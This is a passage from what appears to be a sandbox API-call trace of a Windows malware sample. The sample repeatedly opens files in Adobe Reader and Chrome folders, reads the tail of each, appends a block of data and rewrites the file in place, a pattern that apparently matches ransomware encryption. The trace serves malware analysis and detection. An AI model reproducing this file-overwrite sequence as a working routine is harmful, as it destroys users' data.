lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.962] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4d43 [0117.962] ReadFile (in: hFile=0x204, lpBuffer=0x1ea7b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.973] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4d43 [0117.974] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.975] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0117.975] WriteFile (in: hFile=0x204, lpBuffer=0x1ea7b88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0117.975] CloseHandle (hObject=0x204) returned 1 [0117.975] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\TURKISH.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\turkish.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0117.976] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0117.976] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x3219 [0117.976] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0117.977] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.977] ReleaseMutex (hMutex=0x168) returned 1 [0117.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TURKISH.TXT", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0117.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TURKISH.TXT", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TURKISH.TXT", lpUsedDefaultChar=0x0) returned 11 [0117.977] ReadFile (in: hFile=0x204, lpBuffer=0x1ea7b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.005] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2219 [0118.005] ReadFile (in: hFile=0x204, lpBuffer=0x1ea7b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.009] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2219 [0118.009] WriteFile (in: hFile=0x204, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.009] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0118.010] WriteFile (in: hFile=0x204, lpBuffer=0x1ea7b88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0118.010] CloseHandle (hObject=0x204) returned 1 [0118.010] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1256.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1256.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0118.011] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0118.011] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x22fb [0118.011] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0118.011] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.011] ReleaseMutex (hMutex=0x168) returned 1 [0118.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP1256.TXT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0118.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP1256.TXT", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CP1256.TXT", lpUsedDefaultChar=0x0) returned 10 [0118.012] ReadFile (in: hFile=0x204, lpBuffer=0x1ea7b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.015] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x12fb [0118.015] ReadFile (in: hFile=0x204, lpBuffer=0x1ea7b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.022] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x12fb [0118.022] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.022] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0118.022] WriteFile (in: hFile=0x204, lpBuffer=0x1ea7b88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0118.022] CloseHandle (hObject=0x204) returned 1 [0118.022] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1027.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1027.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.023] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1027.mst", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1027.mst", lpFilePart=0x359f690*="1027.mst") returned 0x64 [0118.023] GetLastError () returned 0x5 [0118.023] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0118.023] LocalFree (hMem=0x69e2b0) returned 0x0 [0118.023] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0118.023] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0118.023] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0118.024] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0118.024] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1027.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1027.mst")) returned 0x21 [0118.024] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1036.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1036.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.024] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1036.mst", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1036.mst", lpFilePart=0x359f690*="1036.mst") returned 0x64 [0118.024] GetLastError () returned 0x5 [0118.024] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0118.024] LocalFree (hMem=0x69e2b0) returned 0x0 [0118.024] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0118.024] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0118.024] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0118.025] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0118.025] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1036.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1036.mst")) returned 0x21 [0118.025] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1046.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1046.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.025] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1046.mst", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1046.mst", lpFilePart=0x359f690*="1046.mst") returned 0x64 [0118.025] GetLastError () returned 0x5 [0118.025] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0118.025] LocalFree (hMem=0x69e2b0) returned 0x0 [0118.025] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0118.025] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0118.026] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0118.026] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0118.026] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1046.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1046.mst")) returned 0x21 [0118.026] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1060.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1060.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.026] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1060.mst", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1060.mst", lpFilePart=0x359f690*="1060.mst") returned 0x64 [0118.026] GetLastError () returned 0x5 [0118.026] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0118.026] LocalFree (hMem=0x69e2b0) returned 0x0 [0118.027] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0118.027] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0118.027] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0118.027] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0118.028] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1060.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1060.mst")) returned 0x21 [0118.028] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\vigtigt.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0118.029] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0118.029] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x41c1 [0118.029] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0118.029] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.029] ReleaseMutex (hMutex=0x168) returned 1 [0118.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vigtigt.htm", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vigtigt.htm", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Vigtigt.htm", lpUsedDefaultChar=0x0) returned 11 [0118.030] ReadFile (in: hFile=0x204, lpBuffer=0x1ea7b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.037] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x31c1 [0118.037] ReadFile (in: hFile=0x204, lpBuffer=0x1ea7b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.039] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x31c1 [0118.039] WriteFile (in: hFile=0x204, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.039] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0118.039] WriteFile (in: hFile=0x204, lpBuffer=0x1ea7b88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0118.040] CloseHandle (hObject=0x204) returned 1 [0118.040] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_200_percent.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_200_percent.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0118.044] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0118.044] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xb0b82 [0118.044] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0118.044] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.044] ReleaseMutex (hMutex=0x168) returned 1 [0118.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrome_200_percent.pak", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0118.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrome_200_percent.pak", cchWideChar=22, lpMultiByteStr=0x1f88ba4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="chrome_200_percent.pak", lpUsedDefaultChar=0x0) returned 22 [0118.044] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0118.052] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.053] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xafb82 [0118.053] ReadFile (in: hFile=0x204, lpBuffer=0x1ea7b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7b88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.055] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xafb82 [0118.056] WriteFile (in: hFile=0x204, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.057] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0118.057] WriteFile (in: hFile=0x204, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0118.057] WriteFile (in: hFile=0x204, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0118.057] CloseHandle (hObject=0x204) returned 1 [0118.058] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\icudtl.dat" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\icudtl.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0118.058] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0118.058] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x9a9480 [0118.058] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0118.058] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.058] ReleaseMutex (hMutex=0x168) returned 1 [0118.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icudtl.dat", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0118.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icudtl.dat", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icudtl.dat", lpUsedDefaultChar=0x0) returned 10 [0118.059] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0118.068] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0118.072] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0118.074] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0118.080] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, 